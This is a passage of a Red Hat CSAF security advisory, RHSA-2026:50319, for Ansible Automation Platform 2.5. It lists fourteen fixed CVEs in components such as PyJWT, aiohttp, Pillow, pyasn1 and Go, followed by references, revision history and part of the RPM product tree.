| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:50319 | self |
| https://access.redhat.com/security/updates/classi… | external |
| https://docs.redhat.com/en/documentation/red_hat_… | external |
| https://docs.redhat.com/en/documentation/red_hat_… | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2467822 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2482734 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484099 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484207 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484377 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484875 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2489127 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497452 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497455 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497464 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497466 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500041 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500043 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500380 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2026-12383 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2489127 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-12383 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-12383 | external |
| https://access.redhat.com/security/cve/CVE-2026-27145 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484207 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-27145 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-27145 | external |
| https://go.dev/cl/783621 | external |
| https://go.dev/issue/79694 | external |
| https://groups.google.com/g/golang-announce/c/tKs… | external |
| https://pkg.go.dev/vuln/GO-2026-5037 | external |
| https://access.redhat.com/security/cve/CVE-2026-33811 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2467822 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-33811 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-33811 | external |
| https://go.dev/cl/767860 | external |
| https://go.dev/issue/78803 | external |
| https://groups.google.com/g/golang-announce/c/qcC… | external |
| https://pkg.go.dev/vuln/GO-2026-4981 | external |
| https://access.redhat.com/security/cve/CVE-2026-34993 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484099 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-34993 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-34993 | external |
| https://github.com/aio-libs/aiohttp/commit/dcf40f… | external |
| https://github.com/aio-libs/aiohttp/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-40898 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484875 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-40898 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-40898 | external |
| https://github.com/quic-go/quic-go/releases/tag/v0.59.1 | external |
| https://github.com/quic-go/quic-go/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-44545 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484377 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44545 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44545 | external |
| https://github.com/django/daphne/blob/main/CHANGE… | external |
| https://access.redhat.com/security/cve/CVE-2026-48526 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2482734 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48526 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48526 | external |
| https://github.com/jpadilla/pyjwt/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-54059 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497464 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54059 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54059 | external |
| https://github.com/python-pillow/Pillow/blob/main… | external |
| https://github.com/python-pillow/Pillow/commit/0a… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-54060 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497466 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54060 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54060 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-55379 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497452 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-55379 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-55379 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-55380 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497455 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-55380 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-55380 | external |
| https://github.com/python-pillow/Pillow/commit/f3… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59197 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500043 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59197 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59197 | external |
| https://github.com/python-pillow/Pillow/commit/cc… | external |
| https://github.com/python-pillow/Pillow/pull/9695 | external |
| https://github.com/python-pillow/Pillow/releases/… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59885 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500380 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59885 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59885 | external |
| https://github.com/pyasn1/pyasn1/commit/45bdb19eb… | external |
| https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4 | external |
| https://github.com/pyasn1/pyasn1/security/advisor… | external |
| https://access.redhat.com/security/cve/CVE-2026-59886 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500041 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59886 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59886 | external |
| https://github.com/pyasn1/pyasn1/commit/e60c691cb… | external |
| https://github.com/pyasn1/pyasn1/security/advisor… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.5\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nSecurity Fix(es):\n\n* automation-controller: PyJWT: Authentication bypass due to forged JSON Web Tokens (CVE-2026-48526)\n* automation-eda-controller: ExternalEventStreamViewSet trusts Subject header without validation and leaks expected DN (CVE-2026-12383)\n* automation-gateway-proxy: Go net package: Denial of Service via long CNAME response in LookupCNAME (CVE-2026-33811)\n* python3.12-aiohttp: Arbitrary code execution via untrusted input to CookieJar.load() (CVE-2026-34993)\n* python3.12-daphne: daphne: Denial of Service via excessive WebSocket message size (CVE-2026-44545)\n* python3.12-pillow: Denial of Service via crafted PCF font data (CVE-2026-54059)\n* python3.12-pillow: Denial of Service via excessive memory allocation when processing font files (CVE-2026-54060)\n* python3.12-pillow: Denial of Service via crafted BDF font file (CVE-2026-55379)\n* python3.12-pillow: Denial of Service via crafted GD 2.x image file (CVE-2026-55380)\n* python3.12-pillow: Native heap out-of-bounds write (CVE-2026-59197)\n* python3.12-pyasn1: Denial of Service via crafted ASN.1 REAL values (CVE-2026-59885)\n* python3.12-pyasn1: Denial of Service via crafted ASN.1 OBJECT IDENTIFIER (CVE-2026-59886)\n* receptor: quic-go: Denial of Service via excessive memory allocation in HTTP/3 trailers (CVE-2026-40898)\n* receptor: golang crypto/x509: Denial of Service via excessive processing of DNS SAN entries (CVE-2026-27145)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nFor details about this release, refer to the release notes listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:50319",
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.5/html/release_notes/patch_releases",
"url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.5/html/release_notes/patch_releases"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.5#Upgrading",
"url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.5#Upgrading"
},
{
"category": "external",
"summary": "2467822",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467822"
},
{
"category": "external",
"summary": "2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "external",
"summary": "2484099",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484099"
},
{
"category": "external",
"summary": "2484207",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484207"
},
{
"category": "external",
"summary": "2484377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484377"
},
{
"category": "external",
"summary": "2484875",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484875"
},
{
"category": "external",
"summary": "2489127",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2489127"
},
{
"category": "external",
"summary": "2497452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497452"
},
{
"category": "external",
"summary": "2497455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497455"
},
{
"category": "external",
"summary": "2497464",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497464"
},
{
"category": "external",
"summary": "2497466",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497466"
},
{
"category": "external",
"summary": "2500041",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500041"
},
{
"category": "external",
"summary": "2500043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500043"
},
{
"category": "external",
"summary": "2500380",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500380"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_50319.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.5 Product Security and Bug Fix Update",
"tracking": {
"current_release_date": "2026-08-05T04:56:48+00:00",
"generator": {
"date": "2026-08-05T04:56:48+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.8"
}
},
"id": "RHSA-2026:50319",
"initial_release_date": "2026-08-04T18:10:56+00:00",
"revision_history": [
{
"date": "2026-08-04T18:10:56+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-08-04T18:10:56+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-08-05T04:56:48+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.5::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5-Inside-1.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.5::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5-Developer-1.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.5::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.5::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5-Inside-1.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.5::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5-Developer-1.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.5::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-daphne-0:4.2.2-1.el9ap.src",
"product": {
"name": "python3.12-daphne-0:4.2.2-1.el9ap.src",
"product_id": "python3.12-daphne-0:4.2.2-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-daphne@4.2.2-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el9ap.src",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.src",
"product_id": "python3.12-pillow-0:12.3.0-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"product": {
"name": "python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"product_id": "python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pulpcore@3.49.66-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"product": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"product_id": "automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.17-2.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-hub-0:4.10.17-1.el9ap.src",
"product": {
"name": "automation-hub-0:4.10.17-1.el9ap.src",
"product_id": "automation-hub-0:4.10.17-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-hub@4.10.17-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"product": {
"name": "python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"product_id": "python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pyasn1@0.6.4-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-0:1.1.21-1.el9ap.src",
"product": {
"name": "automation-eda-controller-0:1.1.21-1.el9ap.src",
"product_id": "automation-eda-controller-0:1.1.21-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller@1.1.21-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"product": {
"name": "python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"product_id": "python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-galaxy-ng@4.10.17-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-0:2.5.20260804-1.el9ap.src",
"product": {
"name": "automation-gateway-0:2.5.20260804-1.el9ap.src",
"product_id": "automation-gateway-0:2.5.20260804-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway@2.5.20260804-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el9ap.src",
"product": {
"name": "receptor-0:1.6.7-1.el9ap.src",
"product_id": "receptor-0:1.6.7-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.6.31-1.el9ap.src",
"product": {
"name": "automation-controller-0:4.6.31-1.el9ap.src",
"product_id": "automation-controller-0:4.6.31-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.6.31-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-daphne-0:4.2.2-1.el8ap.src",
"product": {
"name": "python3.12-daphne-0:4.2.2-1.el8ap.src",
"product_id": "python3.12-daphne-0:4.2.2-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-daphne@4.2.2-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el8ap.src",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el8ap.src",
"product_id": "python3.12-pillow-0:12.3.0-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"product": {
"name": "python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"product_id": "python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pulpcore@3.49.66-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"product": {
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"product_id": "automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.5.10-7.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-0:1.1.21-1.el8ap.src",
"product": {
"name": "automation-eda-controller-0:1.1.21-1.el8ap.src",
"product_id": "automation-eda-controller-0:1.1.21-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller@1.1.21-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-hub-0:4.10.17-1.el8ap.src",
"product": {
"name": "automation-hub-0:4.10.17-1.el8ap.src",
"product_id": "automation-hub-0:4.10.17-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-hub@4.10.17-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"product": {
"name": "python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"product_id": "python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pyasn1@0.6.4-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"product": {
"name": "python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"product_id": "python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-galaxy-ng@4.10.17-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-0:2.5.20260804-1.el8ap.src",
"product": {
"name": "automation-gateway-0:2.5.20260804-1.el8ap.src",
"product_id": "automation-gateway-0:2.5.20260804-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway@2.5.20260804-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el8ap.src",
"product": {
"name": "receptor-0:1.6.7-1.el8ap.src",
"product_id": "receptor-0:1.6.7-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.6.31-1.el8ap.src",
"product": {
"name": "automation-controller-0:4.6.31-1.el8ap.src",
"product_id": "automation-controller-0:4.6.31-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.6.31-1.el8ap?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"product": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"product_id": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debugsource@3.14.1-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"product": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"product_id": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debuginfo@3.14.1-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"product_id": "python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"product": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"product_id": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.3.0-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"product_id": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.3.0-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"product": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"product_id": "automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.17-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"product": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"product_id": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.6.17-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"product": {
